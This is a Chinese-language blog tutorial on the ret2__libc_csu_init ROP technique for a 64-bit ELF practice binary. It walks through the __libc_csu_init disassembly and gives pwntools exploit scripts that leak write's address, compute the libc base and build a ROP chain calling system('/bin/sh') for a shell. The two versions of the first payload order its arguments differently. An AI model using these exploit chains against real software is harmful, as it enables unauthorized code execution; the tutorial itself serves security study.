<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="ROP-ret2__libc_csu_init（64位ELF） 首先64位文件传参方式：当参数少于7个时，参数从左到右放入寄存器：rdi,rsi,rdx,rcx,r8,r9。 当参数为7个以上时，前六个与前面一样，但后面的要依次放入栈中，即和32位程序一样。 例子：function(a,b,c,d,e,f,g,h) 参数a放入rdi，参数b放入rsi，参数c放入rdx，参数d放入rcx，参数e放入">
<meta property="og:type" content="article">
<meta property="og:title" content="Hello~ lpp">
<meta property="og:url" content="http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/index.html">
<meta property="og:site_name" content="Hello~ lpp">
<meta property="og:description" content="ROP-ret2__libc_csu_init（64位ELF） 首先64位文件传参方式：当参数少于7个时，参数从左到右放入寄存器：rdi,rsi,rdx,rcx,r8,r9。 当参数为7个以上时，前六个与前面一样，但后面的要依次放入栈中，即和32位程序一样。 例子：function(a,b,c,d,e,f,g,h) 参数a放入rdi，参数b放入rsi，参数c放入rdx，参数d放入rcx，参数e放入">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-09-16T09:51:33.420Z">
<meta property="article:modified_time" content="2024-08-30T03:04:08.194Z">
<meta property="article:author" content="luyanpei">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Hello~ lpp</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2024/09/16/SROP/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2024/09/16/ret2syscall%EF%BC%8832%E4%BD%8DELF%EF%BC%89/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&text="><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&title="><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&is_video=false&description="><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&title="><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&title="><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&title="><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&title="><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&name=&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&t="><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#ROP-ret2-libc-csu-init%EF%BC%8864%E4%BD%8DELF%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">ROP-ret2__libc_csu_init（64位ELF）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ROP-ret2-libc-csu-init%E7%9A%84%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-number">1.0.1.</span> <span class="toc-text">ROP-ret2__libc_csu_init的利用方法</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">luyanpei</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-09-16T09:51:33.420Z" class="dt-published" itemprop="datePublished">2024-09-16</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="ROP-ret2-libc-csu-init（64位ELF）"><a href="#ROP-ret2-libc-csu-init（64位ELF）" class="headerlink" title="ROP-ret2__libc_csu_init（64位ELF）"></a>ROP-ret2__libc_csu_init（64位ELF）</h2><p> 首先64位文件传参方式：当参数少于7个时，参数从左到右放入寄存器：rdi,rsi,rdx,rcx,r8,r9。</p>
<p>当参数为7个以上时，前六个与前面一样，但后面的要依次放入栈中，即和32位程序一样。</p>
<p>例子：function(a,b,c,d,e,f,g,h)</p>
<p>参数a放入rdi，参数b放入rsi，参数c放入rdx，参数d放入rcx，参数e放入r8，参数f放入r9</p>
<p>剩下的h，g都存放到esp，call function。</p>
<h4 id="ROP-ret2-libc-csu-init的利用方法"><a href="#ROP-ret2-libc-csu-init的利用方法" class="headerlink" title="ROP-ret2__libc_csu_init的利用方法"></a>ROP-ret2__libc_csu_init的利用方法</h4><p>在64位程序中，函数的前六个参数是通过寄存器来传递的，但很多时候，很难找到每一个寄存器对应的gadgets。这时候可以利用x64下的__libc_csu_init中的gadgets，这个函数是用来对libc进行初始化操作的，一般程序都会调用libc函数，所以一定存在这个函数.</p>
<p>下面是整个函数的汇编，存在可利用的点，从000000000040061A到结尾，我们可以利用栈溢出构造栈上的数据来控制rbx，rbp，r12，r13，r14，r15寄存器的数据（都是向寄存器进行pop）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs asm">.text:00000000004005C0                                   ; void __fastcall _libc_csu_init(unsigned int, __int64, __int64)<br>.text:00000000004005C0                                   public __libc_csu_init<br>.text:00000000004005C0                                   __libc_csu_init proc near               ; DATA XREF: _start+16↑o<br>.text:00000000004005C0                                   ; __unwind &#123;<br>.text:00000000004005C0 000 41 57                         push    r15<br>.text:00000000004005C2 008 41 56                         push    r14<br>.text:00000000004005C4 010 41 89 FF                      mov     r15d, edi<br>.text:00000000004005C7 010 41 55                         push    r13<br>.text:00000000004005C9 018 41 54                         push    r12<br>.text:00000000004005CB 020 4C 8D 25 3E 08 20 00          lea     r12, __frame_dummy_init_array_entry<br>.text:00000000004005D2 020 55                            push    rbp<br>.text:00000000004005D3 028 48 8D 2D 3E 08 20 00          lea     rbp, __do_global_dtors_aux_fini_array_entry<br>.text:00000000004005DA 028 53                            push    rbx<br>.text:00000000004005DB 030 49 89 F6                      mov     r14, rsi<br>.text:00000000004005DE 030 49 89 D5                      mov     r13, rdx<br>.text:00000000004005E1 030 4C 29 E5                      sub     rbp, r12<br>.text:00000000004005E4 030 48 83 EC 08                   sub     rsp, 8<br>.text:00000000004005E8 038 48 C1 FD 03                   sar     rbp, 3<br>.text:00000000004005EC 038 E8 0F FE FF FF                call    _init_proc<br>.text:00000000004005EC<br>.text:00000000004005F1 038 48 85 ED                      test    rbp, rbp<br>.text:00000000004005F4 038 74 20                         jz      short loc_400616<br>.text:00000000004005F4<br>.text:00000000004005F6 038 31 DB                         xor     ebx, ebx<br>.text:00000000004005F8 038 0F 1F 84 00 00 00 00 00       nop     dword ptr [rax+rax+00000000h]<br>.text:00000000004005F8<br>.text:0000000000400600<br>.text:0000000000400600                                   loc_400600:                             ; CODE XREF: __libc_csu_init+54↓j<br>.text:0000000000400600 038 4C 89 EA                      mov     rdx, r13<br>.text:0000000000400603 038 4C 89 F6                      mov     rsi, r14<br>.text:0000000000400606 038 44 89 FF                      mov     edi, r15d<br>.text:0000000000400609 038 41 FF 14 DC                   call    ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8]令rbx=0的话就是call r12了，把函数地址放到r12中。  <br>.text:0000000000400609<br>.text:000000000040060D 038 48 83 C3 01                   add     rbx, 1<br>.text:0000000000400611 038 48 39 EB                       cmp     rbx, rbp<br>.text:0000000000400614 038 75 EA                         jnz     short loc_400600<br>.text:0000000000400614<br>.text:0000000000400616<br>.text:0000000000400616                                   loc_400616:                             ; CODE XREF: __libc_csu_init+34↑j<br>.text:0000000000400616 038 48 83 C4 08                   add     rsp, 8<br>.text:000000000040061A 030 5B                            pop     rbx<br>.text:000000000040061B 028 5D                            pop     rbp<br>.text:000000000040061C 020 41 5C                         pop     r12<br>.text:000000000040061E 018 41 5D                         pop     r13<br>.text:0000000000400620 010 41 5E                         pop     r14<br>.text:0000000000400622 008 41 5F                         pop     r15<br>.text:0000000000400624 000 C3                            retn<br>.text:0000000000400624                                   ; &#125; // starts at 4005C0<br></code></pre></td></tr></table></figure>

<p>可利用的汇编如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs asm">.text:000000000040061A 030 5B                            pop     rbx<br>.text:000000000040061B 028 5D                            pop     rbp<br>.text:000000000040061C 020 41 5C                         pop     r12<br>.text:000000000040061E 018 41 5D                         pop     r13<br>.text:0000000000400620 010 41 5E                         pop     r14<br>.text:0000000000400622 008 41 5F                         pop     r15<br>.text:0000000000400624 000 C3                            retn<br></code></pre></td></tr></table></figure>

<p>从0x0000000000400600到0x0000000000400609,我们可以将r13赋给rdx,将r14赋给rsi,将r15d赋给edi(需要注意的是，虽然这里赋给的是edi,但其实此时rdi的高32位寄存器值为0（自行调试），所以其实我们可以控制rdi寄存器的值，只不过只能控制低32位)，而这三个寄存器，也是x64函数调用中传递的前三个寄存器(rdx、rsi、edi)。此外，如果我们可以合理地控制r12与x,那么我们就可以调用我们想要调用的函数。比如说我们可以控制rbx为0,r12为存储我们想要调用的函数的地址。对应的汇编如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs asm">.text:0000000000400600<br>.text:0000000000400600                                   loc_400600:                             ; CODE XREF: __libc_csu_init+54↓j<br>.text:0000000000400600 038 4C 89 EA                      mov     rdx, r13<br>.text:0000000000400603 038 4C 89 F6                      mov     rsi, r14<br>.text:0000000000400606 038 44 89 FF                      mov     edi, r15d<br>.text:0000000000400609 038 41 FF 14 DC                   call    ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8]<br>.text:0000000000400609<br></code></pre></td></tr></table></figure>

<p>从000000000040060D到0000000000400614，我们可以控制rbx与rbp不相等这样就不会执行loc_400600，进而可以继续执行下面的汇编程序，所以可以简单的设置rbx&#x3D;0，rbp&#x3D;1.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs asm">.text:000000000040060D 038 48 83 C3 01                   add     rbx, 1<br>.text:0000000000400611 038 48 39 EB                      cmp     rbx, rbp<br>.text:0000000000400614 038 75 EA                         jnz     short loc_400600<br>.text:0000000000400614<br></code></pre></td></tr></table></figure>

<p>JNZ(或JNE)( jump if not zero,or not equal),汇编语言中的条件转移指令。结果不为零（或不相等）则转移。</p>
<p>payload（用来获取真实的write函数地址）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>a=process(<span class="hljs-string">&#x27;./level5&#x27;</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./level5&#x27;</span>)<br>pop_addr=<span class="hljs-number">0x40061a</span><br>write_got=elf.got[<span class="hljs-string">&#x27;write&#x27;</span>]<br>mov_addr=<span class="hljs-number">0x400600</span><br>padding=<span class="hljs-number">0x80</span>+<span class="hljs-number">0x8</span><br>main_addr=elf.symbols[<span class="hljs-string">&#x27;main&#x27;</span>]<br>a.recvuntil(<span class="hljs-string">&quot;Hello, World\n&quot;</span>)<br>payload1=<span class="hljs-string">b&quot;a&quot;</span>*padding+p64(pop_addr)+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">1</span>)+p64(write_got)+p64(<span class="hljs-number">1</span>)+p64(write_got)+p64(<span class="hljs-number">8</span>)+p64(mov_addr)+<span class="hljs-string">b&quot;a&quot;</span>*(<span class="hljs-number">0x8</span>+<span class="hljs-number">8</span>*<span class="hljs-number">6</span>)+p64(main_addr)<br>gdb.attach(a)<br>a.sendline(payload1)<br>write_true_addr=u64(a.recv(<span class="hljs-number">8</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;write_true_addr_is:&quot;</span>+<span class="hljs-built_in">hex</span>(write_true_addr))<br></code></pre></td></tr></table></figure>

<p>payload1&#x3D;b”a”<em>padding+p64(pop_addr)+p64(0)+p64(1)+p64(write_got)+p64(1)+p64(write_got)+p64(8)+p64(mov_addr)+b”a”</em>(0x8+8*6)+p64(main_addr)</p>
<p>具体讲解这一段payload的意思:<br>b”a”*padding：是用来使程序发生栈溢出</p>
<p>pop_addr：覆盖栈中的返回地址，使程序执行pop_addr地址处的函数。</p>
<p>p64(0)：是给pop rbx中，令rbx&#x3D;0</p>
<p>p64(1)：是给pop rbp中，令rbp&#x3D;1（）通过这两步，在下面此处就不会发生跳转</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs asm">.text:000000000040060D 038 48 83 C3 01                   add     rbx, 1<br>.text:0000000000400611 038 48 39 EB                      cmp     rbx, rbp<br>.text:0000000000400614 038 75 EA                         jnz     short loc_400600<br>.text:0000000000400614<br></code></pre></td></tr></table></figure>

<p>p64(write_got)：是将write_got函数地址给寄存器r12（调用函数 ）</p>
<p>p64(8)：将8给寄存器r13（参数3）</p>
<p>p64(write_got)：将write_got函数地址给寄存器r14（参数2）</p>
<p>p64(1)：将1给r15（参数1）</p>
<p>p64(mov_addr)：覆盖返回地址为mov_addr</p>
<p>就是调用write_got函数，参数是write_got函数地址，也就相当于write(write_got),文件描述符是1，每次写入8个字节。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">ssize_t</span> <span class="hljs-title function_">write</span><span class="hljs-params">(<span class="hljs-type">int</span> fd,<span class="hljs-type">const</span> <span class="hljs-type">void</span>*buf,<span class="hljs-type">size_t</span> count)</span>;<br><br>参数说明：<br><br>fd:是文件描述符（write所对应的是写，即就是<span class="hljs-number">1</span>）<br><br>buf:通常是一个字符串，需要写入的字符串<br><br>count：是每次写入的字节数<br></code></pre></td></tr></table></figure>

<p>在这之后程序转到mov_addr利用mov指令布置寄存器rdx，rsi，edi</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs asm">text:0000000000400600 038 4C 89 EA                      mov     rdx, r13<br>.text:0000000000400603 038 4C 89 F6                      mov     rsi, r14<br>.text:0000000000400606 038 44 89 FF                      mov     edi, r15d<br>.text:0000000000400609 038 41 FF 14 DC                   call    ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8]<br></code></pre></td></tr></table></figure>

<p>在这里，因为rbx和rbp相等，所以继续执行payload代码也就是p64(main_addr),不需要跳转。</p>
<p>从整体上看，我们输入了b”a”<em>136,利用payload1对寄存器布局后又重新回到了main函数，其中b‘a’</em>(0x8+8*6)的作用是为了平衡堆栈，也就是说，当mov_addr执行完之后，按照流程仍然会执行400616处的函数，但是我们希望它直接执行（）函数，如果去执行400616的函数，会再次pop寄存器更换我们的布局，为了堆栈平衡，使用垃圾数据填充此处的代码，将main_addr覆盖至ret，从而执行main</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs asm">.text:0000000000400616                                   loc_400616:                             ; CODE XREF: __libc_csu_init+34↑j<br>.text:0000000000400616 038 48 83 C4 08                   add     rsp, 8<br>.text:000000000040061A 030 5B                            pop     rbx<br>.text:000000000040061B 028 5D                            pop     rbp<br>.text:000000000040061C 020 41 5C                         pop     r12<br>.text:000000000040061E 018 41 5D                         pop     r13<br>.text:0000000000400620 010 41 5E                         pop     r14<br>.text:0000000000400622 008 41 5F                         pop     r15<br>.text:0000000000400624 000 C3                            retn<br></code></pre></td></tr></table></figure>

<p>为什么payload中布置两个write_got的作用：</p>
<p>再布置完寄存器之后，由于有 call    ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8]，调用了write函数，其参数为write_got函数地址，就是write（write_got函数地址），再使用u64（a.recv(8)）接受数据print出来。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br>a=process(<span class="hljs-string">&#x27;./level5&#x27;</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./level5&#x27;</span>)<br>pop_addr=<span class="hljs-number">0x40061a</span><br>write_got=elf.got[<span class="hljs-string">&#x27;write&#x27;</span>]<br>mov_addr=<span class="hljs-number">0x400600</span><br>padding=<span class="hljs-number">0x80</span>+<span class="hljs-number">0x8</span><br>main_addr=elf.symbols[<span class="hljs-string">&#x27;main&#x27;</span>]<br>a.recvuntil(<span class="hljs-string">&quot;Hello, World\n&quot;</span>)<br>payload1=<span class="hljs-string">b&quot;a&quot;</span>*<span class="hljs-number">136</span>+p64(pop_addr)+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">1</span>)+p64(write_got)+p64(<span class="hljs-number">8</span>)+p64(write_got)+p64(<span class="hljs-number">1</span>)+p64(mov_addr)+<span class="hljs-string">b&quot;a&quot;</span>*(<span class="hljs-number">0x8</span>+<span class="hljs-number">8</span>*<span class="hljs-number">6</span>)+p64(main_addr)<br>gdb.attach(a)<br>a.sendline(payload1)<br>write_true_addr=u64(a.recv(<span class="hljs-number">8</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;write_true_addr_is:&quot;</span>+<span class="hljs-built_in">hex</span>(write_true_addr))<br>libc=ELF(<span class="hljs-string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(libc.symbols[<span class="hljs-string">&#x27;write&#x27;</span>]))<br>libc_base=write_true_addr-libc.symbols[<span class="hljs-string">&#x27;write&#x27;</span>]<br>system_addr=libc.symbols[<span class="hljs-string">&#x27;system&#x27;</span>]+libc_base<br>binsh=libc_base+<span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">&#x27;/bin/sh&#x27;</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;libc_base=&quot;</span>+<span class="hljs-built_in">hex</span>(libc_base))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;system=&quot;</span>+<span class="hljs-built_in">hex</span>(system_addr))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;binsh=&quot;</span>+<span class="hljs-built_in">hex</span>(binsh))<br>pop_rdi_ret=<span class="hljs-number">0x400623</span><br>payload=<span class="hljs-string">b&quot;a&quot;</span>*<span class="hljs-number">0x88</span>+p64(pop_rdi_ret)+p64(binsh)+p64(system_addr)<br>a.send(payload)<br>a.interactive()<br></code></pre></td></tr></table></figure>

<p>最后计算基地址，system地址，binsh地址构造rop链进行getshell</p>
<p>​                                                                                                                                                                     </p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#ROP-ret2-libc-csu-init%EF%BC%8864%E4%BD%8DELF%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">ROP-ret2__libc_csu_init（64位ELF）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ROP-ret2-libc-csu-init%E7%9A%84%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-number">1.0.1.</span> <span class="toc-text">ROP-ret2__libc_csu_init的利用方法</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&text="><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&title="><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&is_video=false&description="><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&title="><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&title="><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&title="><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/09/16/ROP-ret2__libc_csu_init%EF%BC%8864%E4%BD%8DELF%EF%BC%89/&title="><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
